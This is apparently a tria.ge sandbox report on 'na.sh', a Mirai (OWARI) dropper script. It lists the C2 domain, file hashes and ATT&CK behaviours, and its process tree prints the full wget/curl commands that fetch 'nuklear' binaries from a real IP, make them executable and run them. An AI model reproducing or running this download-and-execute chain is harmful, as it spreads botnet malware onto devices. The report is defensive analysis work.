Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
155s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
10/10/2024, 07:01
Static task
static1
Behavioral task
behavioral1
Sample
na.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
na.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
na.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
na.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
na.sh
-
Size
2KB
-
MD5
31eb41cbfbbd0e48aecbe2a689a34d71
-
SHA1
a315bbb1681b97a156f747d3ab9f6d0f5694c475
-
SHA256
5d8f0d7fc44dcd6e2488c1e37d9e31be38e558963a7b4531806c8c7d7004cdaa
-
SHA512
50d60c823a9f5d88b21a7b7a5f3261c77ef635af545d0464c1114af51caa2b52f8a5764cfdcbd6587f84daa05db18f15132f61e7d384192fe1c8b18eab9d4ef4
Malware Config
Extracted
mirai
OWARI
milnetbrasil.duckdns.org
Extracted
mirai
OWARI
milnetbrasil.duckdns.org
Signatures
-
Contacts a large (86674) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 6 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 826 chmod 730 chmod 739 chmod 745 chmod 760 chmod 795 chmod -
Executes dropped EXE 6 IoCs
ioc pid Process /tmp/payload 732 payload /tmp/payload 740 payload /tmp/payload 746 payload /tmp/payload 761 payload /tmp/payload 796 payload /tmp/payload 827 payload -
Modifies Watchdog functionality 1 TTPs 8 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog payload File opened for modification /dev/watchdog payload File opened for modification /dev/misc/watchdog payload File opened for modification /dev/watchdog payload File opened for modification /dev/misc/watchdog payload File opened for modification /dev/watchdog payload File opened for modification /dev/misc/watchdog payload File opened for modification /dev/watchdog payload -
Enumerates active TCP sockets 1 TTPs 4 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp payload File opened for reading /proc/net/tcp payload File opened for reading /proc/net/tcp payload File opened for reading /proc/net/tcp payload -
Changes its process name 4 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself 8u1x18d184103a044 746 payload Changes the process name, possibly in an attempt to hide itself 4u240u114124981 761 payload Changes the process name, possibly in an attempt to hide itself 11414189x841a24 796 payload Changes the process name, possibly in an attempt to hide itself d98194981d8d 827 payload -
Reads system network configuration 1 TTPs 4 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp payload File opened for reading /proc/net/tcp payload File opened for reading /proc/net/tcp payload File opened for reading /proc/net/tcp payload -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/766/exe payload File opened for reading /proc/828/exe payload File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/747/exe payload File opened for reading /proc/751/exe payload File opened for reading /proc/802/exe payload File opened for reading /proc/831/exe payload File opened for reading /proc/470/exe payload File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/763/exe payload File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/798/exe payload -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 734 wget 737 curl 738 cat -
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/nuklear.mpsl wget File opened for modification /tmp/nuklear.mpsl curl File opened for modification /tmp/nuklear.arm5 curl File opened for modification /tmp/nuklear.x86 wget File opened for modification /tmp/nuklear.x86 curl File opened for modification /tmp/nuklear.mips curl File opened for modification /tmp/nuklear.arm5 wget File opened for modification /tmp/nuklear.arm6 wget File opened for modification /tmp/nuklear.arm6 curl File opened for modification /tmp/payload na.sh File opened for modification /tmp/nuklear.mips wget File opened for modification /tmp/nuklear.arm4 curl
Processes
-
/tmp/na.sh/tmp/na.sh1⤵
- Writes file to tmp directory
PID:703 -
/usr/bin/wgetwget http://81.161.238.213/389242390482/nuklear.x862⤵
- Writes file to tmp directory
PID:705
-
-
/usr/bin/curlcurl -O http://81.161.238.213/389242390482/nuklear.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:717
-
-
/bin/catcat nuklear.x862⤵PID:728
-
-
/bin/chmodchmod +x na.sh nuklear.x86 payload systemd-private-ecb35f64e3d2458d8c255415f22330e6-systemd-timedated.service-JQ8EJP2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/payload./payload payload2⤵
- Executes dropped EXE
PID:732
-
-
/usr/bin/wgetwget http://81.161.238.213/389242390482/nuklear.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:734
-
-
/usr/bin/curlcurl -O http://81.161.238.213/389242390482/nuklear.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:737
-
-
/bin/catcat nuklear.mips2⤵
- System Network Configuration Discovery
PID:738
-
-
/bin/chmodchmod +x na.sh nuklear.mips nuklear.x86 payload systemd-private-ecb35f64e3d2458d8c255415f22330e6-systemd-timedated.service-JQ8EJP2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/payload./payload payload2⤵
- Executes dropped EXE
PID:740
-
-
/usr/bin/wgetwget http://81.161.238.213/389242390482/nuklear.mpsl2⤵
- Writes file to tmp directory
PID:742
-
-
/usr/bin/curlcurl -O http://81.161.238.213/389242390482/nuklear.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/catcat nuklear.mpsl2⤵PID:744
-
-
/bin/chmodchmod +x na.sh nuklear.mips nuklear.mpsl nuklear.x86 payload systemd-private-ecb35f64e3d2458d8c255415f22330e6-systemd-timedated.service-JQ8EJP2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/payload./payload payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:746
-
-
/usr/bin/wgetwget http://81.161.238.213/389242390482/nuklear.arm42⤵PID:750
-
-
/usr/bin/curlcurl -O http://81.161.238.213/389242390482/nuklear.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/chmodchmod +x na.sh nuklear.arm4 nuklear.mips nuklear.mpsl nuklear.x86 payload systemd-private-ecb35f64e3d2458d8c255415f22330e6-systemd-timedated.service-JQ8EJP2⤵
- File and Directory Permissions Modification
PID:760
-
-
/tmp/payload./payload payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:761
-
-
/usr/bin/wgetwget http://81.161.238.213/389242390482/nuklear.arm52⤵
- Writes file to tmp directory
PID:769
-
-
/usr/bin/curlcurl -O http://81.161.238.213/389242390482/nuklear.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/chmodchmod +x na.sh nuklear.arm4 nuklear.arm5 nuklear.mips nuklear.mpsl nuklear.x86 payload2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/payload./payload payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:796
-
-
/usr/bin/wgetwget http://81.161.238.213/389242390482/nuklear.arm62⤵
- Writes file to tmp directory
PID:801
-
-
/usr/bin/curlcurl -O http://81.161.238.213/389242390482/nuklear.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/chmodchmod +x na.sh nuklear.arm4 nuklear.arm5 nuklear.arm6 nuklear.mips nuklear.mpsl nuklear.x86 payload2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/payload./payload payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:827
-
-
/usr/bin/wgetwget http://81.161.238.213/389242390482/nuklear.arm72⤵PID:834
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
48KB
MD50f8078b069cb47510559b035bd452768
SHA17f035898a85f0bd74bae61e5e7f88f3d7f91a625
SHA256f5544913e371f3f4b59591c735aabecf555877932afa77a9cb19fa3185f3c0e3
SHA5122ff5c2199e690869f6a56468ba56adc0d6d949bd77f01ad4e5030f6d2b2d14a9f916c82e290f24c6c778d8f2e7bbd9563d2228a038efda536425eb1710a93c87
-
Filesize
66KB
MD5f40f75ef70fe1828f474e793ee1b65b8
SHA119d54dfdb398bccb76847fbe807c0f4017f8c75a
SHA256fecae0a43b30d8196123cc4e148a5ecfce6ae06548c0d7b081c4ebbdcb9a93dc
SHA5124ed084ee10ddad9085dc5dfd50573dafdae4f61048e3c7a1395328b13cf65a90199ddfab661ef4161d68bc34f34e45ca3d1744c0bcb89e23173a1a6ef2f4750f
-
Filesize
69KB
MD5f425fff657e00dafd95e0555a67cfaa5
SHA1077fb30cacdb8bd7860b0feac5cf3240593a0770
SHA256bb463c4a9d2b8cb78017bfa881021a873265546a833eb995491a02feda91ecf3
SHA512ae12fc824408615d900cb32beedcabf00193b6d30002da14c50c231ff0cd6273866dccfa0b29a249cc28f8699f29cf555abcfb4b3de6626bac0aa3b7f2b7b3ec